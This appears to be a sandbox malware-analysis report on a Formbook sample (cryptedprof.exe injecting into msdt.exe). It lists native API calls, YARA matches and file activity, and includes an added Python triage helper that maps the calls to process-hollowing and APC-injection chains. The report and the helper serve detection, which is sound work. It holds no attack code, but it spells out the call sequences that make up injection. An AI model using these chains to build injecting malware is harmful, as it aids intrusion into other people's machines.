Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9820 NtEnumerateKey
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFB040 NtSuspendThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9950 NtQueueApcThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A10 NtQuerySection
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9B00 NtSetValueKey
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFAD30 NtSetContextThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9560 NtWriteFile
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF96D0 NtCreateKey
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9650 NtQueryValueKey
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DB040 NtSuspendThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9560 NtWriteFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A20 NtResumeThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A10 NtQuerySection
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9760 NtOpenProcess
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA770 NtOpenThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E90 NtClose
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E10 NtReadFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79F40 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79D60 NtCreateFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E8A NtClose
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79F3C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79DB4 NtReadFile
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79D5A NtCreateFile
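The native-call listing above is what the "Maps a DLL or memory area into another process", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures rest on: the same process resolves NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread and NtResumeThread. The helper below is an added example written for this edit in Python, not part of the Joe Sandbox report or its signature engine. It parses "Source: ... | Code function: ..." lines as printed in the listing, collects the Nt* calls per process index, and reports which injection chains those calls cover. The chain definitions are the editor's own heuristic; the embedded input is an excerpt copied from the listing, trimmed so that the two processes produce different outcomes.

```python
"""Group the report's "Code function" lines by process and flag the
process-injection primitive chains the resolved Nt* calls make possible.
Added example: heuristic grouping, not a Joe Sandbox rule."""
import re
from collections import defaultdict

# Excerpt of the listing above (constructed input for the parser). The
# msdt.exe lines are limited to the APC-related calls on purpose.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9950 NtQueueApcThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFAD30 NtSetContextThread
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9760 NtOpenProcess
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A20 NtResumeThread
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9540 NtReadFile,LdrInitializeThunk
"""

# "Source: <image> | Code function: <proc>_<run>_<addr> <call>,<call>,..."
# The "|" is optional so the parser also accepts the raw, unseparated form.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+(?P<calls>.+)$")

# Each chain is a list of groups; a process covers the chain when it
# resolves at least one call from every group (editor's assumption).
CHAINS = {
    "process hollowing": [
        {"NtCreateProcessEx", "NtUnmapViewOfSection"},   # get/clear a host image
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},  # place the payload
        {"NtSetContextThread"},                          # redirect the entry point
        {"NtResumeThread"},                              # run it
    ],
    "APC injection": [
        {"NtOpenProcess", "NtCreateProcessEx"},          # obtain a target handle
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},  # place the payload
        {"NtQueueApcThread"},                            # schedule it on a thread
        {"NtResumeThread"},                              # let the thread run the APC
    ],
}


def parse_calls(text):
    """Return {(process index, image path): set of Nt* call names}."""
    calls = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.search(line.strip())
        if not m:
            continue
        key = (int(m["pid"]), m["src"])
        for name in m["calls"].split(","):
            name = name.strip()
            if name.startswith("Nt"):        # drop LdrInitializeThunk etc.
                calls[key].add(name)
    return dict(calls)


def matched_chains(api_set):
    """Chains fully covered by api_set -> sorted list of the covering calls."""
    out = {}
    for name, groups in CHAINS.items():
        hits = [api_set & group for group in groups]
        if all(hits):
            out[name] = sorted(set().union(*hits))
    return out


def triage(text):
    """Per process: which injection chains its resolved calls cover."""
    return {key: matched_chains(apis) for key, apis in parse_calls(text).items()}


if __name__ == "__main__":
    for (idx, image), chains in triage(REPORT_LINES).items():
        print(idx, image, chains or "no chain covered")
```

On the excerpt, process 3 (the re-executed cryptedprof.exe) covers both chains and process 7 (msdt.exe) covers only APC injection; on the full listing above, process 7 also resolves NtCreateProcessEx, NtUnmapViewOfSection and NtSetContextThread, so it covers both as well. The caveat a triager needs: these "Code function" lines come from code analysis of the dumped images, so a covered chain means the capability is present, not that it executed; confirm against the dynamic behaviour signatures before calling it injection.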
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00407272
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00406A9B
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_70991A98
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00401027
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00401030
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041E03E
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041E2A1
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041D38B
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041D5F1
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00409E40
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00409E3B
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041DF46
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CFA6
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE20A0
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B820A8
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACB090
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B828EC
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B8E824
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA830
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B71002
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD99BF
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD4120
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABF900
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B822AE
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74AEF
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B6FA2B
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEEBB0
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B623E3
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7DBD2
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B703DA
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEABD8
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82B28
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA309
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADAB40
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74496
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AC841F
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7D466
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2581
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACD5E0
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B825DD
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB0D20
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82D07
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B81D55
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82EF7
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD6E30
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7D616
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046A841F
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04751002
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046C20A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_047620A8
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046AB090
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04761D55
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04690D20
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046B4120
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0469F900
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762D07
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046AD5E0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046C2581
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046B6E30
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762EF7
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_047622AE
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762B28
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04761FF1
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0475DBD2
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046CEBB0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7E2A1
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7D38B
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7E03E
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C69E40
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C69E3B
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CFA6
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C62FB0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C62D90
Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0469B150 appears 35 times
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: String function: 00ABB150 appears 121 times
Source: cryptedprof.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cryptedprof.exe, 00000001.00000003.327029205.0000000002D3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
Source: cryptedprof.exe, 00000001.00000002.335855090.00000000028F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs cryptedprof.exe
Source: cryptedprof.exe, 00000003.00000002.388818719.0000000000D3F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
Source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs cryptedprof.exe
Source: cryptedprof.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@3/3
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_6FC2421B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
Source: C:\Users\user\Desktop\cryptedprof.exe | File created: C:\Users\user\AppData\Local\Temp\nsv1C7.tmp
Source: cryptedprof.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cryptedprof.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\cryptedprof.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: cryptedprof.exe | ReversingLabs: Detection: 27%
